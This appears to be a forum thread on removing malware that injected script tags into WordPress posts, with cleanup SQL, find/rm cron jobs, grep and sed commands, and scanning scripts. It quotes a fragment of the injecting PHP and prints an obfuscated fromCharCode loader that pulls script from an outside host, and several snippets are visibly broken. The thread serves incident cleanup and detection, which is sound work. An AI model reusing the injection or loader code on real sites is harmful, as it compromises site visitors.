How to bulk delete a certain part of all wordpress posts

My site has been hacked, and all posts have had a line of JS code injected under the content!

<script src='' type='text/javascript'></script>

I have found the malware file in the root directory, which injects the JS code with this code:

$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]. " LIMIT 1 ";
    $result2 = $conn->query($q2);
    if ($result2->num_rows > 0) {
        while($row2 = $result2->fetch_assoc()) {
            $val = $row2['post_content'];
            if(strpos($val, === false){
                if(strpos($val, === false){
                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]. " set post_content = CONCAT(post_content,\"<script src='' type='text/javascript'></script>\") WHERE post_content NOT LIKE ''";
                    echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
                } else {

    } else {
} else {

Someone please help me with a MySQL command so I can delete this code from phpMyAdmin.


This is my list of commands for Linux CentOS:

1. remove malware scripts

find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

Put this command in cron to keep the server clean (delete malicious files every 15 minutes if found on the server):

# execute every 15 minutes
*/15 * * * *  find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

2. clean cache from WP plugin

3. clean db

use this sql query

#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";

#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src=''></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src="""" type=""text/javascript""></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src="""" type=""text/javascript""></script>", ''));

#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";

4. check and clean malicious code inside the file

check for plain text malicious code:

cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"

clean code injected as plain text:

grep -rlF "donatello" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/\/statistics.js?n=nb5'><\/script>//g"
grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/\/src.js?n=nb5'><\/script>//g"

check for crypted malicious code, if you convert the numeric string


in utf8, will see:


found the code:

    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"

remove the code:

grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"

The last crypted string is related to "lowerbeforwarden" variant. Use the right sequence for "donatello".

Hope this helps.
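An added example, not part of the answer above: instead of grepping for one exact number sequence, this script decodes every String.fromCharCode(...) literal under a directory and reports the ones that turn out to be URLs, which also covers variants whose sequence you do not know yet. The function names and the sample tree (with example.invalid as a stand-in host) are constructed for illustration.

```shell
#!/bin/sh
# Added example: decode every String.fromCharCode(n,n,...) literal so obfuscated
# script URLs can be found without knowing the exact number sequence.

# Print the decoded text of each literal in one file, one per line.
decode_charcodes() {
    grep -oE 'String\.fromCharCode\([0-9, ]+\)' "$1" |
        sed -E 's/^String\.fromCharCode\(//; s/\)$//' |
        awk -F',' '{ s = ""
                     for (i = 1; i <= NF; i++) s = s sprintf("%c", $i + 0)
                     print s }'
}

# Print "path<TAB>url" for every literal under a directory that decodes to a URL.
scan_charcode_urls() {
    grep -rlF 'String.fromCharCode(' "$1" 2>/dev/null |
    while IFS= read -r f; do
        decode_charcodes "$f" | grep -E '^https?://' | sort -u |
        while IFS= read -r url; do printf '%s\t%s\n' "$f" "$url"; done
    done
}

# Constructed sample tree (assumption: example.invalid stands in for the real host).
make_charcode_sample() {
    d=$(mktemp -d)
    printf '%s\n' '<?php /* constructed infected file */ ?>' \
        '<script>var e=document.createElement(String.fromCharCode(115,99,114,105,112,116));' \
        'e.src=String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,120,46,106,115);</script>' \
        > "$d/header.php"
    printf '%s\n' '<?php echo 1; ?>' > "$d/index.php"
    printf '%s\n' "$d"
}

# Demo: scan the constructed tree; on a server, pass /var/www instead.
sample=$(make_charcode_sample)
scan_charcode_urls "$sample"
rm -rf "$sample"
```

Review the reported files by hand before editing them, since legitimate scripts occasionally use String.fromCharCode as well.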

to @Behemoth thanks for your reply! I just edited your command with " since there is ' in the js code, it works!

UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='' type='text/javascript'></script>", '');

I use a paid theme and some paid plugins, but also 2 nulled plugins. That's a shame! Now I'm looking for some tools to check the code. I hope I can find the backdoor ...

Go to phpMyAdmin. Click on Database and run the following SQL query:

UPDATE wp_posts SET post_content=(REPLACE (post_content, '',''));  

The above contains the js script src. We are just removing that.

This happens for many reasons, and you have to find out the exact source of infection. It mostly occurs in pirated/nulled themes. Follow the steps below to successfully get rid of it.


  1. Use VS Code or something similar that supports "search in files" option. (not Notepad++)
  2. Download the fresh WordPress (The version you are using)


  1. Download a complete backup of your project from server and place it in some folder (say project-dev).
  2. Open that folder using VS Code.
  3. Click on Edit > Search in files
  4. Search for "base64". Ensure that nothing is encoded. If you find something, try to decode it. There are a lot of online base64 decoders available.
  5. Check the function.php file. Check the first line of the file. It should start with a comment. If not, then check what's written. If it is something like
    "class.[sometext]" or "dir/password" or "id/password" followed by some hash inside an if statement, then remove that up to the proper comment line. (Most themes start with a comment.)
  6. Make sure all the files in the theme are required and that you have no more code like this.
  7. In most cases it resides in 2 to 3 places.
  8. Now copy the folder "project-dev/your-project/wp-content/themes/theme-name".
  9. Extract the fresh WordPress you have downloaded before in another directory.
  10. paste the copied theme folder in to your new WordPress.
  11. Copy whole thing and upload it back to server and change the wp-config file.
  12. Also clear the DB that I have mentioned earlier.

If you are stuck then ping me on [email protected]
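An added example, not part of the answer above: steps 4 and 5 as a script that lists files mentioning base64 and flags any functions.php whose first code line is not a comment. It assumes the theme file is named functions.php; the function names and the sample theme are constructed for illustration.

```shell
#!/bin/sh
# Added example: automate the base64 search and the "starts with a comment" check.

# Return 0 when the first non-blank line after "<?php" is a comment.
starts_with_comment() {
    awk 'BEGIN { ok = 1 }
         NR == 1 { sub(/^<\?php[ \t]*/, "") }
         { sub(/\r$/, "") }
         /^[ \t]*$/ { next }
         { ok = ($0 ~ /^[ \t]*(\/\*|\/\/|#)/); exit }
         END { exit !ok }' "$1"
}

# Print one "finding<TAB>path" line per hit under a theme or plugin directory.
audit_theme() {
    # Step 4: any file mentioning base64 needs a manual look.
    grep -rliF 'base64' "$1" 2>/dev/null | sort |
        while IFS= read -r f; do printf 'base64\t%s\n' "$f"; done
    # Step 5: functions.php should open with the theme's header comment.
    find "$1" -type f -name 'functions.php' | sort |
        while IFS= read -r f; do
            starts_with_comment "$f" || printf 'no-header-comment\t%s\n' "$f"
        done
}

# Constructed sample: one clean theme and one with a harmless placeholder injection.
make_theme_sample() {
    d=$(mktemp -d)
    mkdir "$d/clean" "$d/bad"
    printf '%s\n' '<?php' '/**' ' * Theme functions (constructed).' ' */' \
        > "$d/clean/functions.php"
    printf '%s\n' '<?php' \
        'if ($constructed_flag) { $p = base64_decode("Y29uc3RydWN0ZWQ="); }' \
        '/** Theme functions (constructed). */' > "$d/bad/functions.php"
    printf '%s\n' "$d"
}

# Demo: audit the constructed tree; point it at the downloaded backup instead.
sample=$(make_theme_sample)
audit_theme "$sample"
rm -rf "$sample"
```

A hit is a prompt for manual review, not proof of infection: plenty of legitimate plugins use base64 for images or tokens.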

